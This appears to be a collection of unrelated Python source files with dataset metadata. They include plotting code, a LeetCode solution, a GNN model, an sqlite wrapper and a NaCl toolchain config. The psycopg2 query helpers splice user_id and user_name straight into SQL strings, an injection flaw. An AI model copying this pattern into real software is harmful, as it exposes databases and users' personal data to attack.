showextrema=False, widths=.7) colors = plt.cm.gist_ncar(np.linspace(0.2, .8, len(violin_handle['bodies']))) np.random.seed(0) colors = plt.cm.twilight(np.random.rand(len(violin_handle['bodies']))) np.random.shuffle(colors) for pc, c in zip(violin_handle['bodies'], colors): pc.set_facecolor(c) pc.set_edgecolor('black') pc.set_alpha(1.) for tick, label in zip(range(num_boxes), ax.get_xticklabels()): k = tick % 2 ax.text(pos[tick], .95, upper_labels[tick], transform=ax.get_xaxis_transform(), horizontalalignment='center', size='x-small', weight=weights[k]) ax.set_ylabel(metrics[z]) ax.set_ylim(-10, 15) plt.xticks(np.arange(len(fusions)) + 1, fusions) plt.show() fig.savefig('cocktail_sisdr_violins.pdf', bbox_inches='tight')
en
0.399003
# this will load noisy, clean and different predictions # 218880 #load noisy file #test_path= 'C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/data/Cocktail_Party/Normalized/' #test_path='D:/data/EEG processed data/luca way' #exp_folder='C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/experiments/CC/sisdr/with my changes/6/' #exp_folder='C:/Users/hoss3301/work/TrialsOfNeuralVocalRecon/experiments/CC/sisdr/with my changes/9-luca data/2020-09-15/' #load clean sound #### do the prediction: #model_weights_WithSpikes_predict.h5' #intel_matrix=np.zeros(shape=(833,4)) #0:pesq 1:stoi 2:estoi 3:si-sdr #load prediction with spikes #0:pesq 1:stoi 2:estoi 3:si-sdr # for i in range(size): # print(i) # c[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film1[i:i+1,:,:],metric='stsa-mse') #load prediction with spikes #0:pesq 1:stoi 2:estoi 3:si-sdr # for i in range(size): # print(i) # c[i,0]=find_intel(clean[i:i+1,:,:],prediction_withSpikes_film2[i:i+1,:,:],metric='stsa-mse') #load prediction with spikes #0:pesq 1:stoi 2:estoi 3:si-sdr #load prediction with spikes #0:pesq 1:stoi 2:estoi 3:si-sdr #load prediction with spikes #0:pesq 1:stoi 2:estoi 3:si-sdr #load prediction with spikes #0:pesq 1:stoi 2:estoi 3:si-sdr #load prediction with spikes #0:pesq 1:stoi 2:estoi 3:si-sdr #no spikes #0:pesq 1:stoi 2:estoi 3:si-sdr #0:pesq 1:stoi 2:estoi 3:si-sdr #0:pesq 1:stoi 2:estoi 3:si-sdr # data.append(intel_matrix_film1[:,z]) # data.append(intel_matrix_film2[:,z]) # data.append(intel_matrix_film3[:,z]) # data.append(intel_matrix_film4[:,z]) # data.append(intel_matrix_add[:,z]) # data.append(intel_matrix_concatenate[:,z]) # data.append(intel_matrix_choice[:,z]) # data.append(intel_matrix_noSpike[:,z]) #data.append(intel_matrix_noSpike[:, z]) fig = plt.figure() ax = fig.add_axes([0, 0, 1, 1]) for i in range(lm): ax.bar(X + i * width, data[i], width=width) ax.set_ylabel('intelligibility') plt.xticks(X + lm * width / 2, metrics) fusions = [f.replace('_', '') for f in fusions] ax.legend(labels=fusions) #plt.savefig(os.path.join(plot_one_path, 'plot_bars_accs.png'), bbox_inches="tight") fig1, ax1 = plt.subplots() ax1.boxplot(data, labels=fusions) ax1.set_title(metrics[z]) ax1.yaxis.grid(True, linestyle='-', which='major', color='lightgrey', alpha=0.5) for tick, label in zip(range(num_boxes), ax1.get_xticklabels()): k = tick % 2 ax1.text(pos[tick], .95, upper_labels[tick], transform=ax1.get_xaxis_transform(), horizontalalignment='center', size='x-small', weight=weights[k]) plt.show()
1.795098
2
codes_/1021_Remove_Outermost_Parentheses.py
SaitoTsutomu/leetcode
0
6623627
# %% [1021. Remove Outermost Parentheses](https://leetcode.com/problems/remove-outermost-parentheses/) # 問題:一番外側の括弧を取り除け class Solution: def removeOuterParentheses(self, S: str) -> str: res, n = "", 0 for s in S: if s == "(": if n: res += "(" n += 1 else: n -= 1 if n: res += ")" return res
# %% [1021. Remove Outermost Parentheses](https://leetcode.com/problems/remove-outermost-parentheses/) # 問題:一番外側の括弧を取り除け class Solution: def removeOuterParentheses(self, S: str) -> str: res, n = "", 0 for s in S: if s == "(": if n: res += "(" n += 1 else: n -= 1 if n: res += ")" return res
en
0.2928
# %% [1021. Remove Outermost Parentheses](https://leetcode.com/problems/remove-outermost-parentheses/) # 問題:一番外側の括弧を取り除け
3.490901
3
model/model.py
codeKgu/BiLevel-Graph-Neural-Network
20
6623628
<reponame>codeKgu/BiLevel-Graph-Neural-Network import torch.nn as nn from config import FLAGS from model.layers_factory import create_layers class Model(nn.Module): def __init__(self, data, config_layer_type='layer'): super(Model, self).__init__() self.train_data = data self.interaction_num_node_feat = data.dataset.interaction_num_node_feat self.num_node_feat = data.num_node_feat self.num_hyper_edge_feat = data.num_hyper_edge_feat self.num_labels = data.dataset.num_labels self.layers = create_layers(self, config_layer_type, vars(FLAGS)["{}_num".format(config_layer_type)]) self.pred_layer = self.layers[-2] # assume pred layer is second to last layer self._use_layers = 'all' if FLAGS.lower_level_layers and FLAGS.higher_level_layers: self._use_layers = 'init_model' self.init_layers = self.layers[:FLAGS.last_lower_lyr_num] self.lower_layers = self.layers[:FLAGS.last_lower_lyr_num + 1] self.higher_level_layers = self.layers[FLAGS.last_lower_lyr_num + 1:] elif FLAGS.lower_level_layers: self.init_layers = self.layers[:-2] self.lower_layers = self.layers[:-2] assert (len(self.layers) > 0) self._print_layers(None, self.layers) self.layer_output = {} self.acts = None def forward(self, batch_data): # Go through each layer except the last one. # acts = [self._get_ins(self.layers[0])] md = batch_data.merge_data['merge'] self.acts = [md.x] if FLAGS.lower_level_layers and FLAGS.higher_level_layers: if self._use_layers == 'init_layers': layers = self.init_layers elif self._use_layers == 'lower_layers': layers = self.lower_layers elif self._use_layers == 'higher_layers': layers = self.higher_level_layers elif self._use_layers == 'higher_no_eval_layers': layers = self.layers[FLAGS.last_lower_lyr_num + 1:-2] else: if self._use_layers == "higher_no_eval_layers": layers = self.layers[:-2] elif self._use_layers == 'lower_layers': layers = self.lower_layers elif self._use_layers == 'init_layers': layers = self.init_layers else: layers = self.layers for k, layer in enumerate(layers): ins = self.acts[-1] outs = layer(ins, batch_data, self) self.acts.append(outs) total_loss = self.acts[-1] return total_loss def store_layer_output(self, layer, output): self.layer_output[layer] = output def get_layer_output(self, layer): return self.layer_output[layer] # may get KeyError/ValueError def _print_layers(self, branch_name, layers): print('Created {} layers: {}'.format( len(layers), ', '.join(l.__class__.__name__ for l in layers))) @property def use_layers(self): return self._use_layers @use_layers.setter def use_layers(self, setting): assert setting in ['all', 'init_layers', 'lower_layers', 'higher_layers', 'higher_no_eval_layers'] self._use_layers = setting
import torch.nn as nn from config import FLAGS from model.layers_factory import create_layers class Model(nn.Module): def __init__(self, data, config_layer_type='layer'): super(Model, self).__init__() self.train_data = data self.interaction_num_node_feat = data.dataset.interaction_num_node_feat self.num_node_feat = data.num_node_feat self.num_hyper_edge_feat = data.num_hyper_edge_feat self.num_labels = data.dataset.num_labels self.layers = create_layers(self, config_layer_type, vars(FLAGS)["{}_num".format(config_layer_type)]) self.pred_layer = self.layers[-2] # assume pred layer is second to last layer self._use_layers = 'all' if FLAGS.lower_level_layers and FLAGS.higher_level_layers: self._use_layers = 'init_model' self.init_layers = self.layers[:FLAGS.last_lower_lyr_num] self.lower_layers = self.layers[:FLAGS.last_lower_lyr_num + 1] self.higher_level_layers = self.layers[FLAGS.last_lower_lyr_num + 1:] elif FLAGS.lower_level_layers: self.init_layers = self.layers[:-2] self.lower_layers = self.layers[:-2] assert (len(self.layers) > 0) self._print_layers(None, self.layers) self.layer_output = {} self.acts = None def forward(self, batch_data): # Go through each layer except the last one. # acts = [self._get_ins(self.layers[0])] md = batch_data.merge_data['merge'] self.acts = [md.x] if FLAGS.lower_level_layers and FLAGS.higher_level_layers: if self._use_layers == 'init_layers': layers = self.init_layers elif self._use_layers == 'lower_layers': layers = self.lower_layers elif self._use_layers == 'higher_layers': layers = self.higher_level_layers elif self._use_layers == 'higher_no_eval_layers': layers = self.layers[FLAGS.last_lower_lyr_num + 1:-2] else: if self._use_layers == "higher_no_eval_layers": layers = self.layers[:-2] elif self._use_layers == 'lower_layers': layers = self.lower_layers elif self._use_layers == 'init_layers': layers = self.init_layers else: layers = self.layers for k, layer in enumerate(layers): ins = self.acts[-1] outs = layer(ins, batch_data, self) self.acts.append(outs) total_loss = self.acts[-1] return total_loss def store_layer_output(self, layer, output): self.layer_output[layer] = output def get_layer_output(self, layer): return self.layer_output[layer] # may get KeyError/ValueError def _print_layers(self, branch_name, layers): print('Created {} layers: {}'.format( len(layers), ', '.join(l.__class__.__name__ for l in layers))) @property def use_layers(self): return self._use_layers @use_layers.setter def use_layers(self, setting): assert setting in ['all', 'init_layers', 'lower_layers', 'higher_layers', 'higher_no_eval_layers'] self._use_layers = setting
en
0.720737
# assume pred layer is second to last layer # Go through each layer except the last one. # acts = [self._get_ins(self.layers[0])] # may get KeyError/ValueError
2.36872
2
miniFBFlask/queries.py
timruet/DBS_Project
0
6623629
<reponame>timruet/DBS_Project import psycopg2 DATABASE = "postgres" USER = "postgres" PASSWORD = "<PASSWORD>" def get_user_data_based_on_user_id(user_id): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT id, screenname, name, age, income " f"FROM facebook_user " f"where id = {user_id}") result = cur.fetchone() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_user_data_based_on_user_name(user_name): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT id, screenname, name, age, income " f"FROM facebook_user " f"WHERE facebook_user.screenname = \'{user_name}\' ") result = cur.fetchone() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_number_of_records(): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT COUNT(id) FROM facebook_user") result = cur.fetchone() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_user_fans_by_user_id(user_id): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT DISTINCT facebook_user.screenname " f"FROM facebook_user " f"INNER JOIN is_fan_of " f"ON facebook_user.id = is_fan_of.fanid " f"WHERE is_fan_of.idolid = {user_id}") result = cur.fetchall() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_who_user_dates_by_user_id(user_id): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT DISTINCT facebook_user.screenname " f"FROM facebook_user " f"INNER JOIN dates ON facebook_user.id = dates.userid_2 " f"WHERE dates.userid_1 = {user_id}") result = cur.fetchall() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_who_user_marries_by_user_id(user_id): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT DISTINCT facebook_user.screenname " f"FROM facebook_user " f"INNER JOIN is_married_to imt on facebook_user.id = imt.userid_2 " f"WHERE imt.userid_1 = {user_id}") result = cur.fetchall() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result if __name__ == "__main__": print(get_user_data_based_on_user_name("easySmuu"))
import psycopg2 DATABASE = "postgres" USER = "postgres" PASSWORD = "<PASSWORD>" def get_user_data_based_on_user_id(user_id): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT id, screenname, name, age, income " f"FROM facebook_user " f"where id = {user_id}") result = cur.fetchone() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_user_data_based_on_user_name(user_name): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT id, screenname, name, age, income " f"FROM facebook_user " f"WHERE facebook_user.screenname = \'{user_name}\' ") result = cur.fetchone() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_number_of_records(): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT COUNT(id) FROM facebook_user") result = cur.fetchone() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_user_fans_by_user_id(user_id): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT DISTINCT facebook_user.screenname " f"FROM facebook_user " f"INNER JOIN is_fan_of " f"ON facebook_user.id = is_fan_of.fanid " f"WHERE is_fan_of.idolid = {user_id}") result = cur.fetchall() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_who_user_dates_by_user_id(user_id): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT DISTINCT facebook_user.screenname " f"FROM facebook_user " f"INNER JOIN dates ON facebook_user.id = dates.userid_2 " f"WHERE dates.userid_1 = {user_id}") result = cur.fetchall() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result def get_who_user_marries_by_user_id(user_id): conn = None result = None try: conn = psycopg2.connect(host="localhost", database=DATABASE, user=USER, password=PASSWORD) cur = conn.cursor() cur.execute(f"SELECT DISTINCT facebook_user.screenname " f"FROM facebook_user " f"INNER JOIN is_married_to imt on facebook_user.id = imt.userid_2 " f"WHERE imt.userid_1 = {user_id}") result = cur.fetchall() cur.close() except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if conn is not None: conn.close() return result if __name__ == "__main__": print(get_user_data_based_on_user_name("easySmuu"))
none
1
3.278111
3
database/database.py
AivGitHub/clutcher
0
6623630
import sqlite3 import pathlib from clutcher import settings from database import exception class Row(sqlite3.Row): def __init__(self, *args, **kwargs): super(Row, self).__init__() def get(self, attr, default_value: str = None) -> str: try: return self[attr] except IndexError: return default_value class Database: FETCH_MANY_AMOUNT = 100 DEFAULT_ROW_FACTORY = 'Row' _SQL_TORRENT_TABLE = """CREATE TABLE %s torrent ( id integer PRIMARY KEY, name text NOT NULL, torrent_path text, path_to_save text, created_by text, comment text, creation_date text )""" def __init__(self, db_name: str = settings.NAME) -> None: _cwd = pathlib.Path.cwd() self.database_path = (_cwd / 'database/data' / f'{db_name}.db').resolve() self.connection = self.database_path self.cursor = self.connection.cursor() @property def connection(self) -> sqlite3.Connection: return self.__connection @connection.setter def connection(self, db_path: str, row_factory: str = DEFAULT_ROW_FACTORY) -> None: _connection = sqlite3.connect(db_path) if row_factory == self.DEFAULT_ROW_FACTORY: _connection.row_factory = Row else: raise exception.WrongRowFactoryException(f'Wrong row factory: {row_factory}') self.__connection = _connection def execute(self, query: str, values: tuple = ()) -> None: if values: self.cursor.execute(query, values) else: self.cursor.execute(query) self.connection.commit() def create_table(self, query: str = _SQL_TORRENT_TABLE, ignore_existence: bool = True) -> None: """ :param query: Creation query. See _SQL_TORRENT_TABLE example :param ignore_existence: if False, then sqlite3.OperationalError: table torrent already exists is raised :raise: database.exception.WrongQueryException if query does not contain %s for "IF NOT EXISTS" block :raise: sqlite3.OperationalError if ignore_existence = False :return: None TODO: Change to universal way """ _if_not_exists = '' if query and '%s' not in query: raise exception.WrongQueryException('Query must contain \'%s\'') if ignore_existence: _if_not_exists = 'IF NOT EXISTS' self.execute(query % _if_not_exists) def secure_fetchall(self, query: str) -> list: _executed = self.cursor.execute(query) _next = _executed.fetchmany(self.FETCH_MANY_AMOUNT) while _next: mapped_rows = self.rows_mapper(_next) _next = _executed.fetchmany(self.FETCH_MANY_AMOUNT) yield mapped_rows def delete_all_data(self): self.execute('DELETE FROM torrent') @classmethod def rows_mapper(cls, rows: list) -> list: mapped_rows = [] for row in rows: _keys = row.keys() _values = [row.get(key) for key in _keys] _zipped = zip(_keys, _values) mapped_rows.append(dict(_zipped)) return mapped_rows def close(self) -> None: self.connection.close()
import sqlite3 import pathlib from clutcher import settings from database import exception class Row(sqlite3.Row): def __init__(self, *args, **kwargs): super(Row, self).__init__() def get(self, attr, default_value: str = None) -> str: try: return self[attr] except IndexError: return default_value class Database: FETCH_MANY_AMOUNT = 100 DEFAULT_ROW_FACTORY = 'Row' _SQL_TORRENT_TABLE = """CREATE TABLE %s torrent ( id integer PRIMARY KEY, name text NOT NULL, torrent_path text, path_to_save text, created_by text, comment text, creation_date text )""" def __init__(self, db_name: str = settings.NAME) -> None: _cwd = pathlib.Path.cwd() self.database_path = (_cwd / 'database/data' / f'{db_name}.db').resolve() self.connection = self.database_path self.cursor = self.connection.cursor() @property def connection(self) -> sqlite3.Connection: return self.__connection @connection.setter def connection(self, db_path: str, row_factory: str = DEFAULT_ROW_FACTORY) -> None: _connection = sqlite3.connect(db_path) if row_factory == self.DEFAULT_ROW_FACTORY: _connection.row_factory = Row else: raise exception.WrongRowFactoryException(f'Wrong row factory: {row_factory}') self.__connection = _connection def execute(self, query: str, values: tuple = ()) -> None: if values: self.cursor.execute(query, values) else: self.cursor.execute(query) self.connection.commit() def create_table(self, query: str = _SQL_TORRENT_TABLE, ignore_existence: bool = True) -> None: """ :param query: Creation query. See _SQL_TORRENT_TABLE example :param ignore_existence: if False, then sqlite3.OperationalError: table torrent already exists is raised :raise: database.exception.WrongQueryException if query does not contain %s for "IF NOT EXISTS" block :raise: sqlite3.OperationalError if ignore_existence = False :return: None TODO: Change to universal way """ _if_not_exists = '' if query and '%s' not in query: raise exception.WrongQueryException('Query must contain \'%s\'') if ignore_existence: _if_not_exists = 'IF NOT EXISTS' self.execute(query % _if_not_exists) def secure_fetchall(self, query: str) -> list: _executed = self.cursor.execute(query) _next = _executed.fetchmany(self.FETCH_MANY_AMOUNT) while _next: mapped_rows = self.rows_mapper(_next) _next = _executed.fetchmany(self.FETCH_MANY_AMOUNT) yield mapped_rows def delete_all_data(self): self.execute('DELETE FROM torrent') @classmethod def rows_mapper(cls, rows: list) -> list: mapped_rows = [] for row in rows: _keys = row.keys() _values = [row.get(key) for key in _keys] _zipped = zip(_keys, _values) mapped_rows.append(dict(_zipped)) return mapped_rows def close(self) -> None: self.connection.close()
en
0.368847
CREATE TABLE %s torrent ( id integer PRIMARY KEY, name text NOT NULL, torrent_path text, path_to_save text, created_by text, comment text, creation_date text ) :param query: Creation query. See _SQL_TORRENT_TABLE example :param ignore_existence: if False, then sqlite3.OperationalError: table torrent already exists is raised :raise: database.exception.WrongQueryException if query does not contain %s for "IF NOT EXISTS" block :raise: sqlite3.OperationalError if ignore_existence = False :return: None TODO: Change to universal way
2.743338
3
tools/toolchain_tester/toolchain_config.py
eseidel/native_client_patches
4
6623631
<reponame>eseidel/native_client_patches # Copyright 2008 The Native Client Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can # be found in the LICENSE file. # # Config file for various nacl compilation scenarios # import os import sys TOOLCHAIN_CONFIGS = {} class ToolchainConfig(object): def __init__(self, desc, commands, tools_needed, **extra): self._desc = desc, self._commands = commands self._tools_needed = tools_needed self._extra = extra def Append(self, tag, value): assert tag in self._extra self._extra[tag] = self._extra[tag] + ' ' + value + ' ' def SanityCheck(self): for t in self._tools_needed: if not os.access(t, os.R_OK | os.X_OK): print "ERROR: missing tool ", t sys.exit(-1) def GetDescription(self): return self._desc def GetCommands(self, extra): for tag, val in self._commands: d = {} d.update(self._extra) d.update(extra) yield tag, val % d def GetPhases(self): return [a for (a, _) in self._commands] ###################################################################### # ###################################################################### LOCAL_GCC = '/usr/bin/gcc' EMU_SCRIPT = 'toolchain/linux_arm-trusted/qemu_tool.sh' SEL_LDR_ARM = 'scons-out/opt-linux-arm/staging/sel_ldr' SEL_LDR_X32 = 'scons-out/opt-linux-x86-32/staging/sel_ldr' SEL_LDR_X64 = 'scons-out/opt-linux-x86-64/staging/sel_ldr' NACL_GCC_X32 = 'toolchain/linux_x86/bin/nacl-gcc' NACL_GCC_X64 = 'toolchain/linux_x86/bin/nacl64-gcc' GLOBAL_CFLAGS = '-DSTACK_SIZE=0x40000 -DNO_TRAMPOLINES -DNO_LABEL_VALUES' ###################################################################### # LOCAL GCC ###################################################################### COMMANDS_local_gcc = [ ('compile', '%(CC)s %(src)s %(CFLAGS)s -o %(tmp)s.exe', ), ] TOOLCHAIN_CONFIGS['local_gcc_x8632_O0'] = ToolchainConfig( desc='local gcc [x86-32]', commands=COMMANDS_local_gcc, tools_needed=[LOCAL_GCC], CC = LOCAL_GCC, CFLAGS = '-O0 -m32 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['local_gcc_x8664_O0'] = ToolchainConfig( desc='local gcc [x86-64]', commands=COMMANDS_local_gcc, tools_needed=[LOCAL_GCC], CC = LOCAL_GCC, CFLAGS = '-O0 -m64 -static ' + GLOBAL_CFLAGS) ###################################################################### # CS ARM ###################################################################### # NOTE: you may need this if you see mmap: Permission denied # "echo 0 > /proc/sys/vm/mmap_min_addr" GCC_CS_ARM = ('toolchain/linux_arm-trusted/arm-2009q3/' + 'bin/arm-none-linux-gnueabi-gcc') COMMANDS_gcc_cs_arm = [ ('compile', '%(CC)s %(src)s %(CFLAGS)s -o %(tmp)s.exe', ), ('emu', '%(EMU_SCRIPT)s run %(tmp)s.exe', ) ] TOOLCHAIN_CONFIGS['gcc_cs_arm_O0'] = ToolchainConfig( desc='codesourcery cross gcc [arm]', commands=COMMANDS_gcc_cs_arm, tools_needed=[GCC_CS_ARM, EMU_SCRIPT ], CC = GCC_CS_ARM, EMU_SCRIPT = EMU_SCRIPT, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['gcc_cs_arm_O9'] = ToolchainConfig( desc='codesourcery cross gcc [arm]', commands=COMMANDS_gcc_cs_arm, tools_needed=[GCC_CS_ARM, EMU_SCRIPT ], CC = GCC_CS_ARM, EMU_SCRIPT = EMU_SCRIPT, CFLAGS = '-O9 -static ' + GLOBAL_CFLAGS) ###################################################################### # # NACL + SEL_LDR [X86] ###################################################################### COMMANDS_nacl_gcc = [ ('compile', '%(CC)s %(src)s %(CFLAGS)s -o %(tmp)s.exe', ), ('sel_ldr', '%(SEL_LDR)s -f %(tmp)s.exe', ) ] TOOLCHAIN_CONFIGS['nacl_gcc_x8632_O0'] = ToolchainConfig( desc='nacl gcc [x86-32]', commands=COMMANDS_nacl_gcc, tools_needed=[NACL_GCC_X32, SEL_LDR_X32], CC = NACL_GCC_X32, SEL_LDR = SEL_LDR_X32, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['nacl_gcc_x8632_O9'] = ToolchainConfig( desc='nacl gcc with optimizations [x86-32]', commands=COMMANDS_nacl_gcc, tools_needed=[NACL_GCC_X32, SEL_LDR_X32], CC = NACL_GCC_X32, SEL_LDR = SEL_LDR_X32, CFLAGS = '-O9 -static') TOOLCHAIN_CONFIGS['nacl_gcc_x8664_O0'] = ToolchainConfig( desc='nacl gcc [x86-64]', commands=COMMANDS_nacl_gcc, tools_needed=[NACL_GCC_X64, SEL_LDR_X64], CC = NACL_GCC_X64, SEL_LDR = SEL_LDR_X64, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['nacl_gcc_x8664_O9'] = ToolchainConfig( desc='nacl gcc with optimizations [x86-64]', commands=COMMANDS_nacl_gcc, tools_needed=[NACL_GCC_X64, SEL_LDR_X64], CC = NACL_GCC_X64, SEL_LDR = SEL_LDR_X64, CFLAGS = '-O9 -static ' + GLOBAL_CFLAGS) ###################################################################### # PNACL + SEL_LDR [ARM] ###################################################################### DRIVER_PATH = 'toolchain/linux_arm-untrusted/bin' PNACL_LLVM_GCC = DRIVER_PATH + '/pnacl-gcc' PNACL_BCLD = DRIVER_PATH + '/pnacl-bcld' PNACL_LIB_DIR = 'toolchain/linux_arm-untrusted/libs-bitcode/' COMMANDS_llvm_pnacl_arm = [ ('compile-bc', '%(CC)s %(src)s %(CFLAGS)s -c -o %(tmp)s.bc', ), ('translate-arm', '%(LD)s %(tmp)s.bc -o %(tmp)s.nexe -L%(LIB_DIR)s -lc -lnacl -lnosys', ), ('qemu-sel_ldr', '%(EMU)s run %(SEL_LDR)s -Q -d %(tmp)s.nexe', ) ] TOOLCHAIN_CONFIGS['llvm_pnacl_arm_O0'] = ToolchainConfig( desc='pnacl llvm [arm]', commands=COMMANDS_llvm_pnacl_arm, tools_needed=[PNACL_LLVM_GCC, PNACL_BCLD, EMU_SCRIPT, SEL_LDR_ARM], CC = PNACL_LLVM_GCC + ' -emit-llvm', LD = PNACL_BCLD + ' -arch arm', EMU = EMU_SCRIPT, SEL_LDR = SEL_LDR_ARM, LIB_DIR = PNACL_LIB_DIR, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['llvm_pnacl_arm_O9'] = ToolchainConfig( desc='pnacl llvm with optimizations [arm]', commands=COMMANDS_llvm_pnacl_arm, tools_needed=[PNACL_LLVM_GCC, PNACL_BCLD, EMU_SCRIPT, SEL_LDR_ARM], CC = PNACL_LLVM_GCC + ' -emit-llvm', LD = PNACL_BCLD + ' -arch arm', EMU = EMU_SCRIPT, SEL_LDR = SEL_LDR_ARM, LIB_DIR = PNACL_LIB_DIR, CFLAGS = '-09 -static ' + GLOBAL_CFLAGS) ###################################################################### # PNACL + SEL_LDR [X8632] ###################################################################### # NOTE: this is used for both x86 flavors COMMANDS_llvm_pnacl_x86_O0 = [ ('compile-bc', '%(CC)s %(src)s %(CFLAGS)s -c -o %(tmp)s.bc', ), ('translate-x8632', '%(LD)s %(tmp)s.bc -o %(tmp)s.nexe -L%(LIB_DIR)s', ), ('sel_ldr', '%(SEL_LDR)s %(tmp)s.nexe', ) ] TOOLCHAIN_CONFIGS['llvm_pnacl_x8632_O0'] = ToolchainConfig( desc='pnacl llvm [x8632]', commands=COMMANDS_llvm_pnacl_x86_O0, tools_needed=[PNACL_LLVM_GCC, PNACL_BCLD, SEL_LDR_X32], CC = PNACL_LLVM_GCC + ' -emit-llvm', LD = PNACL_BCLD + ' -arch x86-32', SEL_LDR = SEL_LDR_X32, LIB_DIR = PNACL_LIB_DIR, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) ###################################################################### # PNACL + SEL_LDR [X8664] ###################################################################### TOOLCHAIN_CONFIGS['llvm_pnacl_x8664_O0'] = ToolchainConfig( desc='pnacl llvm [x8664]', commands=COMMANDS_llvm_pnacl_x86_O0, tools_needed=[PNACL_LLVM_GCC, PNACL_BCLD, SEL_LDR_X64], CC = PNACL_LLVM_GCC + ' -emit-llvm', LD = PNACL_BCLD + ' -arch x86-64', SEL_LDR = SEL_LDR_X64, LIB_DIR = PNACL_LIB_DIR, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS)
# Copyright 2008 The Native Client Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can # be found in the LICENSE file. # # Config file for various nacl compilation scenarios # import os import sys TOOLCHAIN_CONFIGS = {} class ToolchainConfig(object): def __init__(self, desc, commands, tools_needed, **extra): self._desc = desc, self._commands = commands self._tools_needed = tools_needed self._extra = extra def Append(self, tag, value): assert tag in self._extra self._extra[tag] = self._extra[tag] + ' ' + value + ' ' def SanityCheck(self): for t in self._tools_needed: if not os.access(t, os.R_OK | os.X_OK): print "ERROR: missing tool ", t sys.exit(-1) def GetDescription(self): return self._desc def GetCommands(self, extra): for tag, val in self._commands: d = {} d.update(self._extra) d.update(extra) yield tag, val % d def GetPhases(self): return [a for (a, _) in self._commands] ###################################################################### # ###################################################################### LOCAL_GCC = '/usr/bin/gcc' EMU_SCRIPT = 'toolchain/linux_arm-trusted/qemu_tool.sh' SEL_LDR_ARM = 'scons-out/opt-linux-arm/staging/sel_ldr' SEL_LDR_X32 = 'scons-out/opt-linux-x86-32/staging/sel_ldr' SEL_LDR_X64 = 'scons-out/opt-linux-x86-64/staging/sel_ldr' NACL_GCC_X32 = 'toolchain/linux_x86/bin/nacl-gcc' NACL_GCC_X64 = 'toolchain/linux_x86/bin/nacl64-gcc' GLOBAL_CFLAGS = '-DSTACK_SIZE=0x40000 -DNO_TRAMPOLINES -DNO_LABEL_VALUES' ###################################################################### # LOCAL GCC ###################################################################### COMMANDS_local_gcc = [ ('compile', '%(CC)s %(src)s %(CFLAGS)s -o %(tmp)s.exe', ), ] TOOLCHAIN_CONFIGS['local_gcc_x8632_O0'] = ToolchainConfig( desc='local gcc [x86-32]', commands=COMMANDS_local_gcc, tools_needed=[LOCAL_GCC], CC = LOCAL_GCC, CFLAGS = '-O0 -m32 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['local_gcc_x8664_O0'] = ToolchainConfig( desc='local gcc [x86-64]', commands=COMMANDS_local_gcc, tools_needed=[LOCAL_GCC], CC = LOCAL_GCC, CFLAGS = '-O0 -m64 -static ' + GLOBAL_CFLAGS) ###################################################################### # CS ARM ###################################################################### # NOTE: you may need this if you see mmap: Permission denied # "echo 0 > /proc/sys/vm/mmap_min_addr" GCC_CS_ARM = ('toolchain/linux_arm-trusted/arm-2009q3/' + 'bin/arm-none-linux-gnueabi-gcc') COMMANDS_gcc_cs_arm = [ ('compile', '%(CC)s %(src)s %(CFLAGS)s -o %(tmp)s.exe', ), ('emu', '%(EMU_SCRIPT)s run 